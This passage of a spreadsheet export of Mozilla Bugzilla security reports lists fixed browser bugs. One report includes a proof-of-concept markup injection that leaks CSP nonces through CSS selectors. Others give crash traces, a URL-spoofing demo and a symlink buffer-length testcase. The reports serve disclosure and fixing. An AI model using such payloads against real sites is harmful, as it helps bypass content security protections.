      </c>
      <c r="T2030" t="n">
        <v>1</v>
      </c>
      <c r="U2030" t="n">
        <v>0</v>
      </c>
      <c r="V2030" t="n">
        <v>7</v>
      </c>
      <c r="W2030" t="inlineStr">
        <is>
          <t>**Filed by:** jjones [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=275929980&amp;repo=try
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/JmDcL8iMTGaN5u5JihczXA/runs/0/artifacts/public/logs/live_backing.log
---
Apparently NSS isn't allowed to `stat` the database any more than we used to, and we did something in the last two weeks that added a call.
See https://searchfox.org/mozilla-central/source/browser/base/content/test/performance/browser_startup_mainthreadio.js#424</t>
        </is>
      </c>
      <c r="X2030" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" t="n">
        <v>1871112</v>
      </c>
      <c r="B2031" t="inlineStr">
        <is>
          <t>2023-12-20 10:51:34 -0800</t>
        </is>
      </c>
      <c r="C2031" t="inlineStr">
        <is>
          <t>Improper handling of duplicate `&lt;html&gt;` and `&lt;body&gt;` tags enables CSP nonce leakage</t>
        </is>
      </c>
      <c r="D2031" t="inlineStr">
        <is>
          <t>2024-09-16 00:27:12 -0700</t>
        </is>
      </c>
      <c r="E2031" t="n">
        <v>1</v>
      </c>
      <c r="F2031" t="n">
        <v>1</v>
      </c>
      <c r="G2031" t="n">
        <v>3</v>
      </c>
      <c r="H2031" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2031" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2031" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K2031" t="inlineStr">
        <is>
          <t>Firefox 121</t>
        </is>
      </c>
      <c r="L2031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2031" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2031" t="inlineStr">
        <is>
          <t>[adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q2031" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2031" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2031" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T2031" t="n">
        <v>1</v>
      </c>
      <c r="U2031" t="n">
        <v>0</v>
      </c>
      <c r="V2031" t="n">
        <v>27</v>
      </c>
      <c r="W2031" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Steps to reproduce:
1. Visit https://poc.minimal.blue/nonce?name=%3Cstyle%3Ebody[nonce*=secret]{background:red}%3C/style%3E%3Cbody The page is served with the header `Content-Security-Policy: script-src 'nonce-secret'`
2. Notice that the CSS selector `body[nonce*=secret]` can access the value of the CSP nonce, applying the style to the page (red background). This enables an attacker to bypass the CSP by leaking the nonce value via CSS.
3. An equivalent attack can be performed by injecting an unterminated `&lt;html` tag: https://poc.minimal.blue/nonce?name=%3Cstyle%3Ehtml[nonce*=secret]{background:red}%3C/style%3E%3Chtml
Actual results:
We discovered that a markup injection before a `&lt;script&gt;` element, which includes the nonce attribute, can result in the nonce value being accessible. This behavior can be replicated by injecting a dangling `&lt;html` or `&lt;body` tag, as shown in the code below. Assume that a valid CSP policy is set via an HTTP header, e.g., `Content-Security-Policy: script-src 'nonce-secret'`:
&lt;!DOCTYPE html&gt;
&lt;head&gt;
    &lt;title&gt;PoC&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;h1&gt;CSP Nonce Bypass&lt;/h1&gt;
    Hello &lt;style&gt;body[nonce*=sec]{background:green}&lt;/style&gt;&lt;body
    &lt;script nonce="secret" src="https://example.com/good.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
Please refer to https://poc.minimal.blue/nonce?name=%3Cstyle%3Ebody[nonce*=secret]{background:red}%3C/style%3E%3Cbody for a working example.
The issue affects major browsers including Firefox, Chromium and Safari. We are jointly reporting the vulnerability to Chromium (see bug id 1513216) and Safari
Expected results:
According to the HTML spec, whenever the CSP policy is delivered to the browser over an HTTP header, CSP nonce values must by hidden to CSS selectors to prevent exfiltration via side-channels, see https://html.spec.whatwg.org/multipage/urls-and-fetching.html#nonce-attributes and https://github.com/whatwg/html/issues/2369.
### Detailed information and root cause
After some investigation, we believe that the issue is caused by how the HTML parser handles duplicate `&lt;html&gt;` and `&lt;body&gt;` elements. These elements are merged into their original (i.e., parent) elements, causing all the attributes of the duplicate tags to be added to the parent element. To exemplify this, the following code
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
    &lt;head&gt;&lt;/head&gt;
    &lt;body&gt;
        &lt;html a="w"&gt;
            &lt;html b="0"&gt;&lt;/html&gt;
        &lt;/html&gt;
        &lt;html c="y"&gt;&lt;/html&gt;
    &lt;/body&gt;
&lt;/html&gt;
gets parsed as
&lt;!DOCTYPE html&gt;
&lt;html lang="en" a="w" b="0" c="y"&gt;
    &lt;head&gt;&lt;/head&gt;
    &lt;body&gt;&lt;/body&gt;
&lt;/html&gt;
We noticed that the merging operation bypasses standard security checks, including hiding the `nonce` attribute. Given that these checks are omitted, the `nonce` attribute is merged into the parent `&lt;html&gt;` tag as a normal attribute resulting accessible through CSS selectors.
Please CC Marco Squarcina (squarcina@gmail.com) to this bug
Cheers,
Georg Felber (TU Wien)
Marco Squarcina (TU Wien)</t>
        </is>
      </c>
      <c r="X2031" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" t="n">
        <v>476547</v>
      </c>
      <c r="B2032" t="inlineStr">
        <is>
          <t>2009-02-02 16:15:05 -0800</t>
        </is>
      </c>
      <c r="C2032" t="inlineStr">
        <is>
          <t>Crash [@ nsTextFrameUtils::TransformText] with MathML, lquote, CSS quotes property</t>
        </is>
      </c>
      <c r="D2032" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2032" t="n">
        <v>1</v>
      </c>
      <c r="F2032" t="n">
        <v>1</v>
      </c>
      <c r="G2032" t="n">
        <v>3</v>
      </c>
      <c r="H2032" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2032" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2032" t="inlineStr">
        <is>
          <t>MathML</t>
        </is>
      </c>
      <c r="K2032" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2032" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2032" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2032" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2032" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2032" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2032" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2032" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2032" t="n">
        <v>1</v>
      </c>
      <c r="U2032" t="n">
        <v>0</v>
      </c>
      <c r="V2032" t="n">
        <v>27</v>
      </c>
      <c r="W2032" t="inlineStr">
        <is>
          <t>Created attachment 360186
testcase 1 (assertions only)
Testcase 1:
###!!! ASSERTION: negative length: 'GetContentEnd() - mContentOffset &gt;= 0', file nsTextFrame.h, line 307
###!!! ASSERTION: bad index: 'PRUint32(aIndex) &lt; mState.mLength', file nsTextFragment.h, line 184
###!!! ASSERTION: integer overflow: 'mMaxTextLength &lt;= mMaxTextLength + aFrame-&gt;GetContentLength()', file layout/generic/nsTextFrameThebes.cpp, line 1222
Testcase 2:
Null deref crash [@ nsTextFrameUtils::TransformText]</t>
        </is>
      </c>
      <c r="X2032" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" t="n">
        <v>753162</v>
      </c>
      <c r="B2033" t="inlineStr">
        <is>
          <t>2012-05-08 15:51:49 -0700</t>
        </is>
      </c>
      <c r="C2033" t="inlineStr">
        <is>
          <t>"Assertion failure: cx-&gt;compartment == this" with document.write during DOMAttrModified</t>
        </is>
      </c>
      <c r="D2033" t="inlineStr">
        <is>
          <t>2012-10-21 22:18:58 -0700</t>
        </is>
      </c>
      <c r="E2033" t="n">
        <v>1</v>
      </c>
      <c r="F2033" t="n">
        <v>1</v>
      </c>
      <c r="G2033" t="n">
        <v>3</v>
      </c>
      <c r="H2033" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2033" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2033" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2033" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2033" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2033" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2033" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2033" t="inlineStr">
        <is>
          <t>[sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2033" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2033" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2033" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T2033" t="n">
        <v>1</v>
      </c>
      <c r="U2033" t="n">
        <v>0</v>
      </c>
      <c r="V2033" t="n">
        <v>18</v>
      </c>
      <c r="W2033" t="inlineStr">
        <is>
          <t>Created attachment 622181
testcase (asserts fatally when loaded)
During DOMAttrModified:
###!!! ASSERTION: nsHTMLDocument::Reset() - Wyciwyg Channel  still exists!: '!mWyciwygChannel', file content/html/document/src/nsHTMLDocument.cpp, line 329
(That first assertion might be bug 675518 or bug 680086.)
After DOMAttrModified:
Assertion failure: cx-&gt;compartment == this, at js/src/jscompartment.cpp:124</t>
        </is>
      </c>
      <c r="X2033" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2034">
      <c r="A2034" t="n">
        <v>653926</v>
      </c>
      <c r="B2034" t="inlineStr">
        <is>
          <t>2011-04-30 08:47:17 -0700</t>
        </is>
      </c>
      <c r="C2034" t="inlineStr">
        <is>
          <t>loadSubScript is unwrapping XPCNativeWrapper scope parameter</t>
        </is>
      </c>
      <c r="D2034" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:27 -0700</t>
        </is>
      </c>
      <c r="E2034" t="n">
        <v>1</v>
      </c>
      <c r="F2034" t="n">
        <v>1</v>
      </c>
      <c r="G2034" t="n">
        <v>3</v>
      </c>
      <c r="H2034" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2034" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2034" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2034" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2034" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2034" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2034" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2034" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q2034" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2034" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2034" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2034" t="n">
        <v>1</v>
      </c>
      <c r="U2034" t="n">
        <v>0</v>
      </c>
      <c r="V2034" t="n">
        <v>37</v>
      </c>
      <c r="W2034" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier: Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0
mozIJSSubScriptLoader.loadSubScript’s behavior with XPCNativeWrapper scope parameters seems to have changed from 3.6.* to 4. Specifically in 4 if scope is a XPCNativeWrapper then it is unwrapping it.
I have attached a simple HTML and JS file that demonstrates this, but the basic lines are pretty clear:
The calling code is:
Components.classes["@mozilla.org/moz/jssubscript-loader;1"]                   .getService(Components.interfaces.mozIJSSubScriptLoader).loadSubScript("chrome://exampleext/content/firefox4loadsubscriptchange.min.js",xpcnWrappedWindow);
And the subscript code is simply:
var windowTS = window.toString();
In 3.6.16 windowTS will be “[object XPCNativeWrapper [object Window]]”. In 4.0 it will be “Window”.
I also have a slightly more elaborate case that verifies in the calling code that anything that is done to the window object is added to the wrapper in 3.6, but added directly to the unwrapped window in 4.0.
The seems like a regression to me since loadSubScript is privileged itself so I don't see a reason for hiding the wrapped object from it. 
Also mentioned in this thread (but no replies):
http://groups.google.com/group/mozilla.dev.platform/browse_thread/thread/6ac127f89432fb97/094bb532b6ca8fd7#094bb532b6ca8fd7
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" t="n">
        <v>706719</v>
      </c>
      <c r="B2035" t="inlineStr">
        <is>
          <t>2011-11-30 16:54:44 -0800</t>
        </is>
      </c>
      <c r="C2035" t="inlineStr">
        <is>
          <t>[ASC BUG] Asc misinterprets default &lt;null&gt; value as "null" string value [BREAKS FLASH PLAYER]</t>
        </is>
      </c>
      <c r="D2035" t="inlineStr">
        <is>
          <t>2011-12-20 08:57:54 -0800</t>
        </is>
      </c>
      <c r="E2035" t="n">
        <v>1</v>
      </c>
      <c r="F2035" t="n">
        <v>1</v>
      </c>
      <c r="G2035" t="n">
        <v>6</v>
      </c>
      <c r="H2035" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2035" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J2035" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="K2035" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2035" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2035" t="inlineStr"/>
      <c r="Q2035" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2035" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2035" t="inlineStr">
        <is>
          <t>Q2 12 - Cyril</t>
        </is>
      </c>
      <c r="T2035" t="n">
        <v>1</v>
      </c>
      <c r="U2035" t="n">
        <v>0</v>
      </c>
      <c r="V2035" t="n">
        <v>6</v>
      </c>
      <c r="W2035" t="inlineStr">
        <is>
          <t>The reason Flash Player failed turns out to be ASC.
Take the following example:
===================
class MyClass {
   public function MyClass(a:String=null) 
   {
       var b:Object = a; 
       trace(b==null);
       trace(b=="null");
   }
}
var a:MyClass= new MyClass();
===================
The expected result is "true false" but it prints "false true". It's not at all obvious why because not even abcdump prints the default argument values - but the reason is in ASC putting a wrong default argument in the "MyClass" constructor.</t>
        </is>
      </c>
      <c r="X2035" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" t="n">
        <v>1791029</v>
      </c>
      <c r="B2036" t="inlineStr">
        <is>
          <t>2022-09-15 07:35:53 -0700</t>
        </is>
      </c>
      <c r="C2036" t="inlineStr">
        <is>
          <t>nsLocalFile::GetNativeTarget() may use incorrect string length for Unix symlink target</t>
        </is>
      </c>
      <c r="D2036" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:31 -0700</t>
        </is>
      </c>
      <c r="E2036" t="n">
        <v>1</v>
      </c>
      <c r="F2036" t="n">
        <v>1</v>
      </c>
      <c r="G2036" t="n">
        <v>3</v>
      </c>
      <c r="H2036" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2036" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2036" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K2036" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2036" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2036" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2036" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2036" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q2036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2036" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T2036" t="n">
        <v>1</v>
      </c>
      <c r="U2036" t="n">
        <v>0</v>
      </c>
      <c r="V2036" t="n">
        <v>14</v>
      </c>
      <c r="W2036" t="inlineStr">
        <is>
          <t>When resolving a symlink on a *nix filesystem, the target string may be set to an incorrect length, resulting in a partially uninitialized buffer or truncation.
### Testcase
Depending on the build, `&lt;img src="file:///proc/self/fd/1"&gt;` gives me an error such as
&gt; Security Error: Content at http://localhost/ may not load or link to file:///dev/pts/9oc/self/fd/1%00%00%20%00d%00a%00t%00a%00%20%00f%00r%00o%00m%00%20%00l%00o%00c%00a%00l%00h%00o%00s%00t.
or 
&gt; Security Error: Content at http://localhost/ may not load or link to file:///dev/null%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5%E5.
### Details
In [nsLocalFileUnix.cpp `nsLocalFile::GetNativeTarget()`](https://searchfox.org/mozilla-central/rev/275630dfceb88eee07e4c7d38cd021dd39c2ab23/xpcom/io/nsLocalFileUnix.cpp#1895) the steps to obtain a symlink's target are roughly:
- Use `lstat()` on the symlink path.
```
  struct STAT symStat;
  if (LSTAT(mPath.get(), &amp;symStat) == -1) {
    return NSRESULT_FOR_ERRNO();
  }
```
- Set `target` string length to the symlink size given in `symStat.st_size`.
```
  int32_t size = (int32_t)symStat.st_size;
  nsAutoCString target;
  if (!target.SetLength(size, mozilla::fallible)) {
    return NS_ERROR_OUT_OF_MEMORY;
  }
```
- Use `readlink()` to write the symlink value (without trailing null) to `target`.
```
  if (readlink(mPath.get(), target.BeginWriting(), (size_t)size) &lt; 0) {
    return NSRESULT_FOR_ERRNO();
  }
```
This assumes that the length reported by `lstat()` equals the number of bytes later written to the buffer by `readlink()`.
However, aside from potential races, this doesn't hold true for some special paths: E.g., on the Linux systems I checked, any of the symlinks in `/proc/&lt;pid&gt;/fd/` reports 64 bytes, no matter its target. (Not sure why that is, I haven't found it documented anywhere.) So when resolving a link such as `/proc/self/fd/5`,  `target` may remain partially uninitialized or truncate the value to 64 bytes.
I suppose it'd make sense here to check the return value of `readlink()` for the actual number of bytes written.</t>
        </is>
      </c>
      <c r="X2036" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" t="n">
        <v>602780</v>
      </c>
      <c r="B2037" t="inlineStr">
        <is>
          <t>2010-10-07 22:05:09 -0700</t>
        </is>
      </c>
      <c r="C2037" t="inlineStr">
        <is>
          <t>about:neterror, certerror permit URL spoofing by being same-origin with about:blank</t>
        </is>
      </c>
      <c r="D2037" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:34 -0700</t>
        </is>
      </c>
      <c r="E2037" t="n">
        <v>1</v>
      </c>
      <c r="F2037" t="n">
        <v>1</v>
      </c>
      <c r="G2037" t="n">
        <v>3</v>
      </c>
      <c r="H2037" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2037" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2037" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K2037" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2037" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2037" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q2037" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2037" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2037" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T2037" t="n">
        <v>1</v>
      </c>
      <c r="U2037" t="n">
        <v>0</v>
      </c>
      <c r="V2037" t="n">
        <v>22</v>
      </c>
      <c r="W2037" t="inlineStr">
        <is>
          <t>This demo should speak for itself:
http://lcamtuf.coredump.cx/ffabout/
In essence, "special" about:neterror / about:certerror pages are reachable from about:blank - but are displayed in special contexts where the contents of the address bar point to the destination to which the browser attempted to navigate. This allows address bar spoofing, as shown in the PoC.</t>
        </is>
      </c>
      <c r="X2037" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" t="n">
        <v>638236</v>
      </c>
      <c r="B2038" t="inlineStr">
        <is>
          <t>2011-03-02 14:12:10 -0800</t>
        </is>
      </c>
      <c r="C2038" t="inlineStr">
        <is>
          <t>Crash [@ nsConverterInputStream::Fill(unsigned int *) ] | ASSERTION: Whoa.  The converter should have returned NS_OK_UDEC_MOREINPUT before this point!: 'srcConsumed &lt;= mByteData-&gt;GetLength()'</t>
        </is>
      </c>
      <c r="D2038" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:52 -0700</t>
        </is>
      </c>
      <c r="E2038" t="n">
        <v>1</v>
      </c>
      <c r="F2038" t="n">
        <v>1</v>
      </c>
      <c r="G2038" t="n">
        <v>3</v>
      </c>
      <c r="H2038" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2038" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2038" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2038" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2038" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2038" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2038" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker]</t>
        </is>
      </c>
      <c r="Q2038" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2038" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2038" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2038" t="n">
        <v>1</v>
      </c>
      <c r="U2038" t="n">
        <v>0</v>
      </c>
      <c r="V2038" t="n">
        <v>34</v>
      </c>
      <c r="W2038" t="inlineStr">
        <is>
          <t>1. http://zchoin.fct.put.poznan.pl/en.html
2. assert like a mad man and then crash (wait for it)
1.9.2 doesn't seem to crash but 2.0.0 does. (these files haven't changed since the switch from cvs...)
1.9.2:
###!!! ASSERTION: Whoa.  The converter should have returned NS_OK_UDEC_MOREINPUT before this point!: 'srcConsumed &lt;= mByteData-&gt;GetLength()', file /work/mozilla/builds/1.9.2/mozilla/intl/uconv/src/nsConverterInputStream.cpp, line 255
###!!! ASSERTION: Decoder returned an error but filled the output buffer! Should not happen.: '0 &lt; mUnicharData-&gt;GetBufferSize() - mUnicharDataLength', file /work/mozilla/builds/1.9.2/mozilla/intl/uconv/src/nsConverterInputStream.cpp, line 246
2.0.0:
ASSERTION: Whoa.  The converter should have returned NS_OK_UDEC_MOREINPUT before this point!: 'srcConsumed &lt;= mByteData-&gt;GetLength()', file /work/mozilla/builds/2.0.0/mozilla/intl/uconv/src/nsConverterInputStream.cpp, line 255
ss since I don't like the write aspect and the assert.
On Mac:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xfffdfffd
[Switching to process 44119 thread 0x4603]
0x04cc8b42 in nsRefPtr&lt;nsIRunnable&gt;::~nsRefPtr (this=0xb032abc0) at nsAutoPtr.h:969
969	            mRawPtr-&gt;Release();
(gdb) bt
#0  0x04cc8b42 in nsRefPtr&lt;nsIRunnable&gt;::~nsRefPtr (this=0xb032abc0) at nsAutoPtr.h:969
#1  0x0646fc53 in nsEventQueue::PutEvent (this=0x51839c, runnable=0x23ad8920) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsEventQueue.cpp:140
#2  0x06471332 in nsThread::nsChainedEventQueue::PutEvent (this=0x518394, event=0x23ad8920) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsThread.cpp:760
#3  0x064715c7 in nsThread::PutEvent (this=0x518360, event=0x23ad8920) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsThread.cpp:389
#4  0x06472b6c in nsThread::Dispatch (this=0x518360, event=0x23ad8920, flags=0) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsThread.cpp:433
#5  0x0647a79b in nsTimerImpl::PostTimerEvent (this=0x581980) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsTimerImpl.cpp:552
#6  0x0647b41a in TimerThread::Run (this=0x518620) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/TimerThread.cpp:313
#7  0x06471acc in nsThread::ProcessNextEvent (this=0x5806c0, mayWait=1, result=0xb032aecc) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsThread.cpp:633
#8  0x063f808a in NS_ProcessNextEvent_P (thread=0x5806c0, mayWait=1) at nsThreadUtils.cpp:250
#9  0x064725f3 in nsThread::ThreadFunc (arg=0x5806c0) at /work/mozilla/builds/2.0.0/mozilla/xpcom/threads/nsThread.cpp:278
#10 0x00084c49 in _pt_root (arg=0x583ec0) at /work/mozilla/builds/2.0.0/mozilla/nsprpub/pr/src/pthreads/ptthread.c:187
#11 0x95f28155 in _pthread_start ()
#12 0x95f28012 in thread_start ()
On Windows:
Operating system: Windows NT
                  5.1.2600 Service Pack 3
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  EXCEPTION_ACCESS_VIOLATION_WRITE
Crash address: 0x4281000
Thread 0 (crashed)
 0  xul.dll!nsConverterInputStream::Fill(unsigned int *) [nsConverterInputStream.cpp : 247 + 0x29]
    eip = 0x10088306   esp = 0x0012d1c8   ebp = 0x0012d210   ebx = 0x00000001
    esi = 0x0000a770   edi = 0x00000000   eax = 0x0426c120   ecx = 0x041fe9b8
    edx = 0x1153fffd   efl = 0x00010246
    Found by: given as instruction pointer in context
 1  xul.dll!nsConverterInputStream::Read(unsigned short *,unsigned int,unsigned int *) [nsConverterInputStream.cpp : 105 + 0xe]
    eip = 0x10087d84   esp = 0x0012d218   ebp = 0x0012d228
    Found by: call frame info
 2  xul.dll!nsCSSScanner::EnsureData() [nsCSSScanner.cpp : 634 + 0x2e]
    eip = 0x109d3663   esp = 0x0012d230   ebp = 0x0012d24c
    Found by: call frame info
 3  xul.dll!nsCSSScanner::Read() [nsCSSScanner.cpp : 653 + 0x1b]
    eip = 0x109d3714   esp = 0x0012d254   ebp = 0x0012d25c
    Found by: call frame info
 4  xul.dll!nsCSSScanner::Next(nsCSSToken &amp;) [nsCSSScanner.cpp : 754 + 0x7]
    eip = 0x109d3a51   esp = 0x0012d264   ebp = 0x0012d284
    Found by: call frame info
 5  xul.dll!`anonymous namespace'::CSSParserImpl::GetToken(int) [nsCSSParser.cpp : 1292 + 0x11]
    eip = 0x109d6a9c   esp = 0x0012d28c   ebp = 0x0012d294
    Found by: call frame info
 6  xul.dll!`anonymous namespace'::CSSParserImpl::Parse(nsIUnicharInputStream *,nsIURI *,nsIURI *,nsIPrincipal *,unsigned int,int) [nsCSSParser.cpp : 916 + 0x9]
    eip = 0x109d5abc   esp = 0x0012d29c   ebp = 0x0012d2c4
